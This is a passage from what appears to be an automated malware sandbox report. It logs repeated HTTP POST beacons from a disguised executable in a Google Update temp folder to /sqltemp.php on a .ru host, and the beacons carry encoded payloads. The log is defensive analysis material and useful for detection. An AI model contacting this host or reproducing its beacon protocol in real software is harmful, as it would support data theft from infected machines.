                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=1719&rtt_var=1260&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=349115&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  54 | 192.168.2.6 | 62689 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:54.420037031 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:54.766705036 CET | 1124 | OUT | Data Raw: 56 5f 5a 50 54 50 54 50 58 56 52 59 56 50 59 55 5b 53 54 5e 55 59 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V_ZPTPTPXVRYVPYU[ST^UYPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&<6#)]3A/1R#.'+#*(] "*;1,?R-*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:54.867084026 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:55.041129112 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56YrcE1CYQKPQP8w79NMAAAY7Yr%2BmcxQ2ETKkvo4WuNr%2BvGvttWUTp8EzOVnJpUlf6M1VwijnFh2vrqmdxzc3Z16QBUZb9zqeBvG7nNVczW77iYC%2FFseRI4Oyw3%2BYwSj4Ex9VgLG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364a0a84643bb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7907&min_rtt=1747&rtt_var=12975&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28612&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  55 | 192.168.2.6 | 62690 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:55.160346031 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:55.516705036 CET | 1124 | OUT | Data Raw: 56 51 5f 5c 54 59 51 50 58 56 52 59 56 5c 59 5e 5b 5f 54 5f 55 5e 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_\TYQPXVRYV\Y^[_T_U^P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/%Z7?>$.C,\% [(()- Y4<+6%?9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:55.605273962 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:55.894943953 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wc8j9sk02sygY%2Bi3axULcvsPN7PwHY0NCXlEgkM0dDwH9DL02bUV8fTZoSyCa7S9Y5M0L62drMVGef%2FEkaETxYy4pf2ZBXS70AbF0dAhTwPN%2F7R7qiEah%2Bj0q4V14944d1PNi9ML"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364a54ec342cc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2593&min_rtt=2199&rtt_var=1614&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=272591&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  56 | 192.168.2.6 | 62691 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:56.019465923 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:56.375916958 CET | 1124 | OUT | Data Raw: 53 52 5f 57 54 5a 51 55 58 56 52 59 56 58 59 5e 5b 5a 54 5a 55 5a 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_WTZQUXVRYVXY^[ZTZUZP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^': ?Y$>+;*9S#<4)> <&&?/.&Y.,Y-%


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  57 | 192.168.2.6 | 62692 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:56.444670916 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:56.797801018 CET | 1936 | OUT | Data Raw: 56 56 5f 53 51 5c 54 53 58 56 52 59 56 5f 59 5f 5b 5a 54 5a 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_SQ\TSXVRYV_Y_[ZTZUXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'-\4' 8\:4;(<*?#3?=C%<#W-&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:02:56.915550947 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:57.178294897 CET | 954 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mn6xjwc37HMp4eaTbHN1oBVBOqxrfme4MHbd0o28cWKj85A9gr9%2BdHpwyhuuWgbokj6vhJzM5oKeNNb4pPRgPGdYDHXiRsOhHAy7sycEwRAzEjQ8FE882oVRNBqgXrFdRnQNO%2BYb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364ad7dba3300-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=20195&min_rtt=16056&rtt_var=14299&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2238&delivery_rate=29694&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 1c 3e 3d 25 0d 24 32 02 5c 28 03 23 52 27 3d 2e 59 3f 06 07 00 27 3e 23 11 2a 17 05 11 36 3f 3e 07 26 38 23 00 23 13 23 5f 24 1e 2b 59 05 1c 20 44 36 01 2c 11 28 3d 09 5e 31 06 3d 5c 26 3d 28 5e 3f 3b 37 0a 20 3b 24 06 24 2d 16 59 29 14 28 1f 27 2f 2f 5b 2d 11 25 53 33 00 2c 54 00 11 26 1c 33 08 3b 05 23 0e 30 1f 22 0f 17 58 26 42 32 1b 32 3c 06 09 20 17 08 58 31 0b 23 59 22 23 25 03 25 5d 3e 03 37 13 28 0a 3e 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%>=%$2\(#R'=.Y?'>#*6?>&8###_$+Y D6,(=^1=\&=(^?;7 ;$$-Y)('//[-%S3,T&3;#0"X&B22< X1#Y"#%%]>7(>%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  58 | 192.168.2.6 | 62693 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:56.566843987 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:56.922776937 CET | 1124 | OUT | Data Raw: 56 53 5a 50 51 5b 54 54 58 56 52 59 56 5c 59 50 5b 58 54 51 55 5a 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VSZPQ[TTXVRYV\YP[XTQUZPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&?41X%>+A.)=V#$Z*9?>(X 2++=%/9&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:57.043538094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:57.307996988 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BMUOxd6oPBJRF5HgEBfaxvRTxDfct0mIUfm5vnuNicwG5f3Uf9rnDFzkfJzO7J24YC2wSbhqDQEFydPQJDwF%2FXSnYvTjKA29Xc%2Bst3n%2BDnJyqyTwRn4MXAZk13EuhYluwlTlCJXE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364ae3b0243ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7647&min_rtt=1650&rtt_var=12613&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=29418&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  59 | 192.168.2.6 | 62695 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:57.462373018 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:57.813605070 CET | 1124 | OUT | Data Raw: 56 50 5f 55 54 5f 54 54 58 56 52 59 56 5c 59 56 5b 5c 54 50 55 5c 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_UT_TTXVRYV\YV[\TPU\PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$4-3=#/\-R7=?* )-;4'+E$??U:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:57.934504032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:58.203170061 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IApTrA%2FUAanQJ31BpCrsg23ngMNYFfWFHBCmts4X4v%2F3AjgwUrwOeBVvzZFwxa0NBOYt9OuNlTwhqCcC5gp1K7yI0iJnIkVFeqTXXXXXFDVs4Bnd0pfRezEL8TMSq%2BM%2BEgZb9sud"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364b3cf3c5e62-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9821&min_rtt=1691&rtt_var=16895&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=21877&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  60 | 192.168.2.6 | 62696 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:58.331763029 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:58.688498020 CET | 1124 | OUT | Data Raw: 53 50 5a 53 54 50 54 51 58 56 52 59 56 5c 59 53 5b 52 54 5d 55 5b 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZSTPTQXVRYV\YS[RT]U[PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$4$= .:T -?)U==;42(-A%?T-*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:58.784244061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:59.045042992 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHJtfbIGsNIWTGsOvxGUFAY10KgZPo6TVGEso%2BTY8qFI0lS%2FRgSr9zLQQOBMRW83ydTm4y2MQtwgtCU3XCQcBzivCAB5on2qGEWZSPleNaOsm6Q20w7zF1he7yiSq1k22vUgPFyl"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364b91ff98ccd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4835&min_rtt=2051&rtt_var=6338&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=60013&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  61 | 192.168.2.6 | 62697 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:59.173705101 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:59.532166004 CET | 1124 | OUT | Data Raw: 53 52 5f 55 54 5e 54 5d 58 56 52 59 56 50 59 5e 5b 5c 54 5b 55 55 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_UT^T]XVRYVPY^[\T[UUPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$> !X3X48\%V#-;?3W*X' [+]"%',*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:59.618066072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:59.880044937 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j5eB%2BP2Lvu4KsxCpa1sSgrd2b3b8GZVbP%2F8o1nDUovOOAlSTwGSEnBkaI5AF5AUt0zI%2BsBUD2a35v8ovzGHKootX%2F4CV%2Bi8aBNdmMOAdrcOuu9MshyRJWxAfuUd5g9puSpm5jBIj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364be5dbbc463-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2213&min_rtt=1471&rtt_var=2037&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=196977&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  62 | 192.168.2.6 | 62698 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:00.005923033 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:00.360438108 CET | 1124 | OUT | Data Raw: 53 52 5a 54 51 5d 51 56 58 56 52 59 56 5a 59 56 5b 5a 54 5a 55 55 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SRZTQ]QVXVRYVZYV[ZTZUUPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0Y9\ ,:'.,"#.8X+9R*-' 1<(+:&S:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:00.457968950 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:00.717327118 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zt086lOWmA4iQOZwPUqLx267lkIDcnKDtZcu%2FzTKhFBXYlGIUW%2FgU%2FUIWTF74I2Va7z5ob%2BbokW0t4dwVa8qYTH4btm9tKc8RPcIHntB4mzr1vruXc8XX2ISjOsVip5da5%2BmH466"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364c39be2186d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4228&min_rtt=1460&rtt_var=6083&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=61853&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
